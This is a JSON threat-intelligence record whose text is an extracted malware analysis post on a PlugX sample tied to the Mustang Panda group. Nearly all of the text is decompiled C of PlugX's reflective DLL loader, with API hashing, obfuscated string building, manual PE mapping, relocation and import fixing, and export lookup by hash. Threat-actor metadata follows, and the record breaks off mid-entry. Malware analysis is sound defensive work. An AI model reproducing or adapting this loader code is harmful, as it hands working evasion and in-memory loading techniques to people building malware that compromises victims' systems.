{ "id": "1acb4943-eb65-48ec-9906-fb5befc3dbd1", "created_at": "2026-04-06T00:09:33.031264Z", "updated_at": "2026-04-10T03:36:33.385813Z", "deleted_at": null, "sha1_hash": "a0002020dd5651bfeb5f8d3092a81eb2d6df39c2", "title": "Diving into a PlugX sample of Mustang Panda group", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 371970, "plain_text": "Diving into a PlugX sample of Mustang Panda group\r\nPublished: 2022-12-27 · Archived: 2026-04-05 22:56:51 UTC\r\nint __cdecl plx_dll_loader( int pPlugxDllBaseAddr, _DWORD *pre_exportFuncHash, int\r\nexport_arg1, int export_arg2, int export_arg3, unsigned int dwFlag)\r\n{\r\nwstr_kernel32_dll[0] = 'k' ;\r\nwstr_kernel32_dll[1] = 'e' ;\r\nwstr_kernel32_dll[4] = 'e' ;\r\nwstr_kernel32_dll[6] = '3' ;\r\nwstr_kernel32_dll[7] = '2' ;\r\nwstr_kernel32_dll[8] = '.' ;\r\nLoadLibraryA = 0;\r\nVirtualAlloc = 0;\r\nFlushInstructionCache = 0;\r\nGetNativeSystemInfo = 0;\r\nVirtualProtect = 0;\r\nSleep = 0;\r\nRtlAddFunctionTable = 0;\r\nwstr_kernel32_dll[2] = 'r' ;\r\nwstr_kernel32_dll[3] = 'n' ;\r\nwstr_kernel32_dll[5] = 'l' ;\r\nwstr_kernel32_dll[9] = 'd' ;\r\nwstr_kernel32_dll[0xA] = 'l' ;\r\nwstr_kernel32_dll[0xB] = 'l' ;\r\nqmemcpy(\u0026apiFuncs, \"Sleep\" , 5);\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 1 of 22\n\nqmemcpy(apiFuncs.wstr_LoadLibraryA, \"LoadLibraryAVirtualProtect\" , 0x1A);\r\nqmemcpy(apiFuncs.wstr_VirtualAlloc, \"VirtualAlloc\" , sizeof (apiFuncs.wstr_VirtualAlloc));\r\nqmemcpy(wstr_FlushInstructionCache, \"FlushInstructionCache\" ,\r\nsizeof (wstr_FlushInstructionCache));\r\nqmemcpy(\u0026wstr_GetNativeSystemInfo[1], \"etNativeSystemInfo\" , 0x12);\r\nstr_RtlAddFunctionTable[0x12] = 0x65;\r\nwstr_GetNativeSystemInfo[0] = 0x47;\r\nqmemcpy(str_RtlAddFunctionTable, \"RtlAddFunctionTabl\" , 0x12);\r\nLdrLoadDll = plx_retrieve_api_from_hash(0xBDBF9C13);\r\nLdrGetProcedureAddress = plx_retrieve_api_from_hash(0x5ED941B5u);\r\nmoduleInfo.Buffer = wstr_kernel32_dll;\r\nmoduleInfo.MaximumLength = 0x18;\r\nmoduleInfo.Length = 0x18;\r\ntmp_var.LdrGetProcedureAddress = LdrGetProcedureAddress;\r\nLdrLoadDll(0, 0, \u0026moduleInfo, \u0026dllHandle);\r\napiName.Length = 12;\r\napiName.Buffer = apiFuncs.wstr_VirtualAlloc;\r\napiName.MaximumLength = 12;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026VirtualAlloc);\r\napiName.Length = 14;\r\napiName.MaximumLength = 14;\r\napiName.Buffer = apiFuncs.wstr_VirtualProtect;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026VirtualProtect);\r\napiName.Length = 21;\r\napiName.MaximumLength = 21;\r\napiName.Buffer = wstr_FlushInstructionCache;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026FlushInstructionCache);\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 2 of 22\n\napiName.Length = 0x13;\r\napiName.Buffer = wstr_GetNativeSystemInfo;\r\napiName.MaximumLength = 0x13;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026GetNativeSystemInfo);\r\napiName.Length = 5;\r\napiName.MaximumLength = 5;\r\napiName.Buffer = \u0026apiFuncs;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026Sleep);\r\napiName.Length = 0x13;\r\napiName.Buffer = str_RtlAddFunctionTable;\r\napiName.MaximumLength = 0x13;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026RtlAddFunctionTable);\r\napiName.Length = 12;\r\napiName.Buffer = apiFuncs.wstr_LoadLibraryA;\r\napiName.MaximumLength = 12;\r\nLdrGetProcedureAddress(dllHandle.kernel32_handle, \u0026apiName, 0, \u0026LoadLibraryA);\r\nif ( !VirtualAlloc )\r\n{\r\nreturn FALSE;\r\n}\r\nif ( !VirtualProtect )\r\n{\r\nreturn FALSE;\r\n}\r\nif ( !Sleep )\r\n{\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 3 of 22\n\nreturn FALSE;\r\n}\r\nif ( !FlushInstructionCache )\r\n{\r\nreturn FALSE;\r\n}\r\nif ( !GetNativeSystemInfo )\r\n{\r\nreturn FALSE;\r\n}\r\ncp_pPlugxDllBaseAddr = pPlugxDllBaseAddr;\r\npPlugxDllNtHeaders = (pPlugxDllBaseAddr + *(pPlugxDllBaseAddr + offsetof(IMAGE_DOS_HEADER,\r\ne_lfanew)));\r\nif ( pPlugxDllNtHeaders-\u003eSignature != IMAGE_NT_SIGNATURE )\r\n{\r\nreturn FALSE;\r\n}\r\nif ( pPlugxDllNtHeaders-\u003eFileHeader.Machine != IMAGE_FILE_MACHINE_I386 )\r\n{\r\nreturn FALSE;\r\n}\r\nplxHeaderInfo.SectionAlignment = pPlugxDllNtHeaders-\u003eOptionalHeader.SectionAlignment;\r\nif ( plxHeaderInfo.SectionAlignment \u0026 1 )\r\n{\r\nreturn FALSE;\r\n}\r\ntotal_section_size = 0;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 4 of 22\n\nnum_of_sections = pPlugxDllNtHeaders-\u003eFileHeader.NumberOfSections;\r\nif ( pPlugxDllNtHeaders-\u003eFileHeader.NumberOfSections )\r\n{\r\npPlugxSectionHeaders = (\u0026pPlugxDllNtHeaders-\u003eOptionalHeader.SizeOfUninitializedData +\r\npPlugxDllNtHeaders-\u003eFileHeader.SizeOfOptionalHeader);\r\ndo\r\n{\r\nif ( ADJ(pPlugxSectionHeaders)-\u003eSizeOfRawData )\r\n{\r\nplxHeaderInfo.SizeOfRawData = ADJ(pPlugxSectionHeaders)-\u003eSizeOfRawData;\r\n}\r\nsection_size = ADJ(pPlugxSectionHeaders)-\u003eVirtualAddress + plxHeaderInfo.SizeOfRawData;\r\nif ( section_size \u003c= total_section_size )\r\n{\r\nsection_size = total_section_size;\r\n}\r\npPlugxSectionHeaders += 0xA;\r\ntotal_section_size = section_size;\r\nplxHeaderInfo.SectionAlignment = pPlugxDllNtHeaders-\u003eOptionalHeader.SectionAlignment;\r\n--num_of_sections;\r\n}\r\nwhile ( num_of_sections );\r\ncp_pPlugxDllBaseAddr = pPlugxDllBaseAddr;\r\n}\r\nGetNativeSystemInfo(\u0026system_info);\r\nv15 = ~(system_info.dwPageSize - 1);\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 5 of 22\n\nplx_dllSizeOfImage = v15 \u0026 (pPlugxDllNtHeaders-\u003eOptionalHeader.SizeOfImage +\r\nsystem_info.dwPageSize - 1);\r\nif ( plx_dllSizeOfImage != (v15 \u0026 (total_section_size + system_info.dwPageSize - 1)) )\r\n{\r\nreturn FALSE;\r\n}\r\npPlugxNewBaseAddr = VirtualAlloc(pPlugxDllNtHeaders-\u003eOptionalHeader.ImageBase,\r\nplx_dllSizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);\r\nif ( !pPlugxNewBaseAddr )\r\n{\r\npPlugxNewBaseAddr = VirtualAlloc(0, plx_dllSizeOfImage, MEM_RESERVE|MEM_COMMIT,\r\nPAGE_READWRITE);\r\n}\r\nif ( dwFlag \u0026 1 )\r\n{\r\n*(pPlugxNewBaseAddr + offsetof(IMAGE_DOS_HEADER, e_lfanew)) = *(cp_pPlugxDllBaseAddr +\r\noffsetof(IMAGE_DOS_HEADER, e_lfanew));\r\noffset_from_e_lfanew = *(cp_pPlugxDllBaseAddr + offsetof(IMAGE_DOS_HEADER, e_lfanew));\r\nif ( offset_from_e_lfanew \u003c pPlugxDllNtHeaders-\u003eOptionalHeader.SizeOfHeaders )\r\n{\r\npPlugxNewNtHeaders = (pPlugxNewBaseAddr + offset_from_e_lfanew);\r\ndo\r\n{\r\n++offset_from_e_lfanew;\r\nLOBYTE(pPlugxNewNtHeaders-\u003eSignature) = *(\u0026pPlugxNewNtHeaders-\u003eSignature +\r\ncp_pPlugxDllBaseAddr - pPlugxNewBaseAddr);\r\npPlugxNewNtHeaders = (pPlugxNewNtHeaders + 1);\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 6 of 22\n\nwhile ( offset_from_e_lfanew \u003c pPlugxDllNtHeaders-\u003eOptionalHeader.SizeOfHeaders );\r\n}\r\n}\r\nelse                                          \r\n{\r\nfor ( cnt = 0; cnt \u003c pPlugxDllNtHeaders-\u003eOptionalHeader.SizeOfHeaders; ++pPlugxNewBaseAddr )\r\n{\r\n++cnt;\r\n*pPlugxNewBaseAddr = *(pPlugxNewBaseAddr + cp_pPlugxDllBaseAddr - pPlugxNewBaseAddr);\r\n}\r\n}\r\nnTotalSectionCopied = 0;\r\npPlugxNewNtHeaders = (pPlugxNewBaseAddr + *(pPlugxNewBaseAddr + offsetof(IMAGE_DOS_HEADER,\r\ne_lfanew)));\r\ntmp_var2.nTotalSectionCopied = 0;\r\nif ( pPlugxNewNtHeaders-\u003eFileHeader.NumberOfSections )\r\n{\r\npPlugxNewSectionHeaders = (\u0026pPlugxNewNtHeaders-\u003eOptionalHeader.AddressOfEntryPoint +\r\npPlugxNewNtHeaders-\u003eFileHeader.SizeOfOptionalHeader);\r\ndo\r\n{\r\ncnt = 0;\r\nif ( ADJ(pPlugxNewSectionHeaders)-\u003eSizeOfRawData )\r\n{\r\ndo\r\n{\r\n*(pPlugxNewBaseAddr + ADJ(pPlugxNewSectionHeaders)-\u003eVirtualAddress + cnt) = *(cnt\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 7 of 22\n\n+\r\nADJ(pPlugxNewSectionHeaders)-\u003ePointerToRawData\r\n+\r\ncp_pPlugxDllBaseAddr);\r\n++cnt;\r\n}\r\nwhile ( cnt \u003c ADJ(pPlugxNewSectionHeaders)-\u003eSizeOfRawData );\r\nnTotalSectionCopied = tmp_var2.nTotalSectionCopied;\r\n}\r\nNumberOfSections = pPlugxNewNtHeaders-\u003eFileHeader.NumberOfSections;\r\n++nTotalSectionCopied;\r\npPlugxNewSectionHeaders += 0xA;\r\ntmp_var2.nTotalSectionCopied = nTotalSectionCopied;\r\n}\r\nwhile ( nTotalSectionCopied \u003c NumberOfSections );\r\n}\r\ndelta_offset = pPlugxNewBaseAddr - pPlugxNewNtHeaders-\u003eOptionalHeader.ImageBase;\r\ndelta_offset = pPlugxNewBaseAddr - pPlugxNewNtHeaders-\u003eOptionalHeader.ImageBase;\r\nif ( delta_offset )\r\n{\r\nif ( pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[5].Size )\r\n{\r\nrelocation = (pPlugxNewBaseAddr + pPlugxNewNtHeaders-\r\n\u003eOptionalHeader.DataDirectory[5].VirtualAddress);\r\nif ( relocation-\u003eVirtualAddress )\r\n{\r\nv29 = delta_offset;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 8 of 22\n\nwhile ( 1 )\r\n{\r\nfor ( ++relocation; relocation != (relocation + relocation-\u003eSizeOfBlock); relocation =\r\n(relocation + 2) )\r\n{\r\nv31 = relocation-\u003eVirtualAddress;\r\nrel_type = LOWORD(relocation-\u003eVirtualAddress) \u003e\u003e 0xC;\r\nswitch ( rel_type )\r\n{\r\ncase IMAGE_DEBUG_TYPE_OMAP_FROM_SRC|IMAGE_DEBUG_TYPE_CODEVIEW:\r\nv33 = relocation-\u003eVirtualAddress;\r\ndelta_offset = relocation-\u003eVirtualAddress \u0026 0xFFF;\r\n*(v33 + pPlugxNewBaseAddr + delta_offset) += v29;\r\ncontinue ;\r\ncase IMAGE_REL_BASED_HIGHLOW:\r\n*(pPlugxNewBaseAddr + (v31 \u0026 0xFFF) + relocation-\u003eVirtualAddress) += v29;\r\ncontinue ;\r\ncase IMAGE_REL_ALPHA_REFLONG:\r\nv34 = v29 \u003e\u003e 0x10;\r\nbreak ;\r\ncase IMAGE_REL_PPC_ADDR32:\r\nv34 = v29;\r\nbreak ;\r\ndefault :\r\ncontinue ;\r\n}\r\n*(pPlugxNewBaseAddr + (v31 \u0026 0xFFF) + relocation-\u003eVirtualAddress) += v34;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 9 of 22\n\n}\r\nif ( !relocation-\u003eVirtualAddress )\r\n{\r\ncp_pPlugxDllBaseAddr = pPlugxDllBaseAddr;\r\nbreak ;\r\n}\r\n}\r\n}\r\n}\r\n}\r\nif ( pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[1].Size )\r\n{\r\nimportTblRVA = pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[1].VirtualAddress;\r\nnImportedDll = 0;\r\ncp_nDllImported = 0;\r\npPlugXNewImportDesc = (importTblRVA + pPlugxNewBaseAddr);\r\npNameRVA = (importTblRVA + pPlugxNewBaseAddr + offsetof(IMAGE_IMPORT_DESCRIPTOR, Name));\r\ntmp_var_1.pPlugXNewImportDesc = (importTblRVA + pPlugxNewBaseAddr);\r\nif ( ADJ(pNameRVA)-\u003eName )\r\n{\r\ndo\r\n{\r\npNameRVA += 5;\r\n++nImportedDll;\r\n}\r\nwhile ( ADJ(pNameRVA)-\u003eName );\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 10 of 22\n\ncp_nDllImported = nImportedDll;\r\n}\r\ndelta_offset = 0;\r\nv102 = dwFlag \u0026 4;\r\nimportTblRVA_ = importTblRVA;\r\nif ( dwFlag \u0026 4 \u0026\u0026 nImportedDll \u003e 1 )\r\n{\r\ntmp_var2.pPlugXNewImportDesc = 0;\r\ndelta_offset = dwFlag \u003e\u003e 0x10;\r\nnDll = nImportedDll - 1;\r\ni = 0;\r\npPlugXNewImportDesc_ = (importTblRVA + pPlugxNewBaseAddr);\r\ndo\r\n{\r\npPlugxDllBaseAddra = 0x343FD * cp_pPlugxDllBaseAddr + 0x269EC3;\r\nv42 = \u0026pPlugXNewImportDesc[i + (HIWORD(pPlugxDllBaseAddra) \u0026 0x7FFFu) / (0x7FFF /\r\n(nImportedDll - i) + 1)];\r\n++i;\r\nqmemcpy(v109, v42, sizeof (v109));\r\nv43 = v42;\r\nnImportedDll = cp_nDllImported;\r\nqmemcpy(v43, pPlugXNewImportDesc_, sizeof (IMAGE_IMPORT_DESCRIPTOR));\r\nqmemcpy(pPlugXNewImportDesc_, v109, sizeof (IMAGE_IMPORT_DESCRIPTOR));\r\ncp_pPlugxDllBaseAddr = pPlugxDllBaseAddra;\r\n++pPlugXNewImportDesc_;\r\npPlugXNewImportDesc = tmp_var_1.pPlugXNewImportDesc;\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 11 of 22\n\nwhile ( i \u003c nDll );\r\nimportTblRVA_ = pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[1].VirtualAddress;\r\n}\r\ntmp_var2.pPlugXNewImportDesc = (importTblRVA_ + pPlugxNewBaseAddr);\r\ndllNameRVA = *(importTblRVA_ + pPlugxNewBaseAddr + offsetof(IMAGE_IMPORT_DESCRIPTOR, Name));\r\nif ( dllNameRVA )\r\n{\r\npPlugXNewImportDesc = tmp_var2.pPlugXNewImportDesc;\r\ndo\r\n{\r\nmodule_handle = LoadLibraryA((pPlugxNewBaseAddr + dllNameRVA));\r\ndllHandle.module_handle = module_handle;\r\nthunkRef = (pPlugxNewBaseAddr + pPlugXNewImportDesc-\u003eOriginalFirstThunk);\r\nfuncRef = (pPlugxNewBaseAddr + pPlugXNewImportDesc-\u003eFirstThunk);\r\nthunkRefInfo = thunkRef-\u003eu1.AddressOfData;\r\nif ( thunkRef-\u003eu1.AddressOfData )\r\n{\r\nLdrGetProcedureAddress = tmp_var.LdrGetProcedureAddress;\r\nwhile ( TRUE )\r\n{\r\nif ( thunkRefInfo \u003e= 0 )\r\n{\r\nlen_str_apiName = 0;\r\nstr_apiName = \u0026thunkRefInfo-\u003eName[pPlugxNewBaseAddr];\r\ntmp_var_1.str_apiName = str_apiName;\r\nif ( *str_apiName )\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 12 of 22\n\n{\r\ndo\r\n{\r\n++len_str_apiName;\r\n++str_apiName;\r\n}\r\nwhile ( *str_apiName );\r\nstr_apiName = tmp_var_1.str_apiName;\r\n}\r\napiName.Length = len_str_apiName;\r\napiName.MaximumLength = len_str_apiName;\r\napiName.Buffer = str_apiName;\r\nLdrGetProcedureAddress(module_handle, \u0026apiName, 0, \u0026funcRef-\u003eu1.Function);\r\n}\r\nelse\r\n{\r\nLdrGetProcedureAddress(module_handle, 0, LOWORD(thunkRef-\u003eu1.AddressOfData),\r\n\u0026funcRef-\u003eu1.Function);\r\n}\r\n++thunkRef;\r\n++funcRef;\r\nthunkRefInfo = thunkRef-\u003eu1.AddressOfData;\r\nif ( !thunkRef-\u003eu1.AddressOfData )\r\n{\r\nbreak ;\r\n}\r\nmodule_handle = dllHandle.module_handle;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 13 of 22\n\n}\r\npPlugXNewImportDesc = tmp_var2.pPlugXNewImportDesc;\r\n}\r\nif ( delta_offset \u0026\u0026 v102 \u0026\u0026 cp_nDllImported \u003e 1 )\r\n{\r\nSleep(0x3E8 * delta_offset);\r\n}\r\ndllNameRVA = pPlugXNewImportDesc[1].Name;\r\n++pPlugXNewImportDesc;\r\ntmp_var2.pPlugXNewImportDesc = pPlugXNewImportDesc;\r\n}\r\nwhile ( dllNameRVA );\r\n}\r\n}\r\npage_Protection = IMAGE_SCN_CNT_CODE;\r\nif ( pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[0xD].Size )\r\n{\r\npDelayLoadDesc = (pPlugxNewBaseAddr + pPlugxNewNtHeaders-\r\n\u003eOptionalHeader.DataDirectory[0xD].VirtualAddress + 4);\r\ntmp_var2.pdelayImportDesc = pDelayLoadDesc;\r\nDllNameRVA = ADJ(pDelayLoadDesc)-\u003eDllNameRVA;\r\nif ( DllNameRVA )\r\n{\r\nv56 = \u0026ADJ(tmp_var2.pdelayImportDesc)-\u003eDllNameRVA;\r\ndo\r\n{\r\nmodule_handle = LoadLibraryA((pPlugxNewBaseAddr + DllNameRVA));\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 14 of 22\n\ndllHandle.module_handle = module_handle;\r\nImportAddressTableRVA = (pPlugxNewBaseAddr + ADJ(v56)-\u003eImportAddressTableRVA);\r\nImportNameTableRVA = (pPlugxNewBaseAddr + ADJ(v56)-\u003eImportNameTableRVA);\r\nif ( ImportAddressTableRVA-\u003eu1.AddressOfData )\r\n{\r\nLdrGetProcedureAddress = tmp_var.LdrGetProcedureAddress;\r\nwhile ( TRUE )\r\n{\r\nImportNameRVA = ImportNameTableRVA-\u003eu1.AddressOfData;\r\nif ( (ImportNameTableRVA-\u003eu1.AddressOfData \u0026 0x80000000) == 0 )\r\n{\r\nlen_str_delayAPIName = 0;\r\nstr_delayAPIName = \u0026ImportNameRVA-\u003eName[pPlugxNewBaseAddr];\r\nv102 = str_delayAPIName;\r\nif ( *str_delayAPIName )\r\n{\r\ndo\r\n{\r\n++len_str_delayAPIName;\r\n++str_delayAPIName;\r\n}\r\nwhile ( *str_delayAPIName );\r\nstr_delayAPIName = v102;\r\n}\r\napiName.Length = len_str_delayAPIName;\r\napiName.MaximumLength = len_str_delayAPIName;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 15 of 22\n\napiName.Buffer = str_delayAPIName;\r\nLdrGetProcedureAddress(module_handle, \u0026apiName, 0, \u0026ImportAddressTableRVA-\r\n\u003eu1.Function);\r\n}\r\nelse\r\n{\r\nLdrGetProcedureAddress(module_handle, 0, ImportNameRVA, \u0026ImportAddressTableRVA-\r\n\u003eu1.AddressOfData);\r\n}\r\n++ImportAddressTableRVA;\r\n++ImportNameTableRVA;\r\nif ( !ImportAddressTableRVA-\u003eu1.Function )\r\n{\r\nbreak ;\r\n}\r\nmodule_handle = dllHandle.module_handle;\r\n}\r\nv56 = \u0026ADJ(tmp_var2.pdelayImportDesc)-\u003eDllNameRVA;\r\n}\r\npage_Protection = IMAGE_SCN_CNT_CODE;\r\nv56 += 8;\r\ntmp_var2.pdelayImportDesc = v56;\r\nDllNameRVA = ADJ(v56)-\u003eDllNameRVA;\r\n}\r\nwhile ( ADJ(v56)-\u003eDllNameRVA );\r\n}\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 16 of 22\n\ncnt = 0;\r\nif ( pPlugxNewNtHeaders-\u003eFileHeader.NumberOfSections )\r\n{\r\npPlugxNewSectionHeaders = (\u0026pPlugxNewNtHeaders-\u003eOptionalHeader.AddressOfEntryPoint +\r\npPlugxNewNtHeaders-\u003eFileHeader.SizeOfOptionalHeader);\r\ndo\r\n{\r\nif ( ADJ(pPlugxNewSectionHeaders)-\u003eSizeOfRawData )\r\n{\r\nsectionCharacteristics = ADJ(pPlugxNewSectionHeaders)-\u003eCharacteristics;\r\nsection_can_read = ADJ(pPlugxNewSectionHeaders)-\u003eCharacteristics \u0026 IMAGE_SCN_MEM_READ;\r\nif ( sectionCharacteristics \u0026 IMAGE_SCN_MEM_EXECUTE )\r\n{\r\nif ( section_can_read )\r\n{\r\nflNewProtect = IMAGE_SCN_CNT_INITIALIZED_DATA;\r\n}\r\nelse\r\n{\r\nflNewProtect = IMAGE_SCN_CNT_UNINITIALIZED_DATA;\r\npage_Protection = 0x10;\r\n}\r\nif ( sectionCharacteristics \u003e= 0 )\r\n{\r\nflNewProtect = page_Protection;\r\n}\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 17 of 22\n\nelse\r\n{\r\nif ( section_can_read )\r\n{\r\nflNewProtect = 4;\r\npage_protection = 2;\r\n}\r\nelse\r\n{\r\nflNewProtect = IMAGE_SCN_TYPE_NO_PAD;\r\npage_protection = PAGE_NOACCESS;\r\n}\r\nif ( sectionCharacteristics \u003e= 0 )\r\n{\r\nflNewProtect = page_protection;\r\n}\r\n}\r\nflOldProtect = flNewProtect;\r\nif ( ADJ(pPlugxNewSectionHeaders)-\u003eCharacteristics \u0026 IMAGE_SCN_MEM_NOT_CACHED )\r\n{\r\nflNewProtect |= IMAGE_SCN_LNK_INFO;\r\nflOldProtect = flNewProtect;\r\n}\r\nVirtualProtect(\r\n(pPlugxNewBaseAddr + ADJ(pPlugxNewSectionHeaders)-\u003eVirtualAddress),\r\nADJ(pPlugxNewSectionHeaders)-\u003eSizeOfRawData,\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 18 of 22\n\nflNewProtect,\r\n\u0026flOldProtect);\r\n}\r\n++cnt;\r\npPlugxNewSectionHeaders += 0xA;\r\npage_Protection = IMAGE_SCN_CNT_CODE;\r\n}\r\nwhile ( cnt \u003c pPlugxNewNtHeaders-\u003eFileHeader.NumberOfSections );\r\n}\r\nFlushInstructionCache(0xFFFFFFFF, 0, 0);\r\nif ( pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[9].Size )\r\n{\r\ntlsDir = *(pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[9].VirtualAddress +\r\npPlugxNewBaseAddr + 0xC);\r\nfor ( tlsCallBackFunc = ADJ(tlsDir)-\u003eAddressOfCallBacks; ADJ(tlsDir)-\u003eAddressOfCallBacks;\r\ntlsCallBackFunc = ADJ(tlsDir)-\u003eAddressOfCallBacks )\r\n{\r\ntlsCallBackFunc(pPlugxNewBaseAddr, 1, 0);\r\n++tlsDir;\r\n}\r\n}\r\n((pPlugxNewBaseAddr + pPlugxNewNtHeaders-\u003eOptionalHeader.AddressOfEntryPoint))(pPlugxNewBaseAddr,\r\n1, 0);\r\nif ( !pre_exportFuncHash )\r\n{\r\nreturn pPlugxNewBaseAddr;\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 19 of 22\n\nif ( !pPlugxNewNtHeaders-\u003eOptionalHeader.DataDirectory[0].Size )\r\n{\r\nreturn pPlugxNewBaseAddr;\r\n}\r\nexportDirRVA = (pPlugxNewBaseAddr + pPlugxNewNtHeaders-\r\n\u003eOptionalHeader.DataDirectory[offsetof(IMAGE_NT_HEADERS, Signature)].VirtualAddress);\r\nnumExportedNames = exportDirRVA-\u003eNumberOfNames;\r\nif ( !numExportedNames )\r\n{\r\nreturn pPlugxNewBaseAddr;\r\n}\r\nif ( !exportDirRVA-\u003eNumberOfFunctions )\r\n{\r\nreturn pPlugxNewBaseAddr;\r\n}\r\nAddressOfNameOrdinalsRVA = exportDirRVA-\u003eAddressOfNameOrdinals;\r\npNameAddressTbl = (pPlugxNewBaseAddr + exportDirRVA-\u003eAddressOfNames);\r\ntmp_var.dwExportHash = 0;\r\npOrdinalsTbl = (pPlugxNewBaseAddr + AddressOfNameOrdinalsRVA);\r\ndo\r\n{\r\nexportNameRVA = *pNameAddressTbl;\r\ntmp_var2.cnt = 0;\r\nstr_exported_func = (pPlugxNewBaseAddr + exportNameRVA);\r\nif ( !str_exported_func )\r\n{\r\nbreak ;\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 20 of 22\n\n}\r\nchr = *str_exported_func;\r\nif ( *str_exported_func )\r\n{\r\ndwExportHash = tmp_var2.dwExportHash;\r\ndo\r\n{\r\ndwExportHash = __ROR4__(chr + dwExportHash, 0xD);\r\nchr = *++str_exported_func;\r\n}\r\nwhile ( *str_exported_func );\r\ntmp_var2.dwExportHash = dwExportHash;\r\nnumExportedNames = exportDirRVA-\u003eNumberOfNames;\r\nif ( pre_exportFuncHash == dwExportHash )\r\n{\r\nif ( pOrdinalsTbl )\r\n{\r\nexportFunc = (pPlugxNewBaseAddr + *(exportDirRVA-\u003eAddressOfFunctions + 4 * *pOrdinalsTbl\r\n+ pPlugxNewBaseAddr));\r\nif ( dwFlag \u0026 8 )\r\n{\r\nexportFunc(export_arg3, 4);\r\n}\r\nelse\r\n{\r\nexportFunc(export_arg1, export_arg2);\r\n}\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 21 of 22\n\nreturn pPlugxNewBaseAddr;\r\n}\r\n}\r\n}\r\n++pNameAddressTbl;\r\n++pOrdinalsTbl;\r\n++tmp_var.cnt;\r\n}\r\nwhile ( tmp_var.cnt \u003c numExportedNames );\r\nreturn pPlugxNewBaseAddr;\r\n}\r\nSource: https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nhttps://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/\r\nPage 22 of 22", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/" ], "report_names": [ "diving-into-a-plugx-sample-of-mustang-panda-group" ], "threat_actors": [ { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": 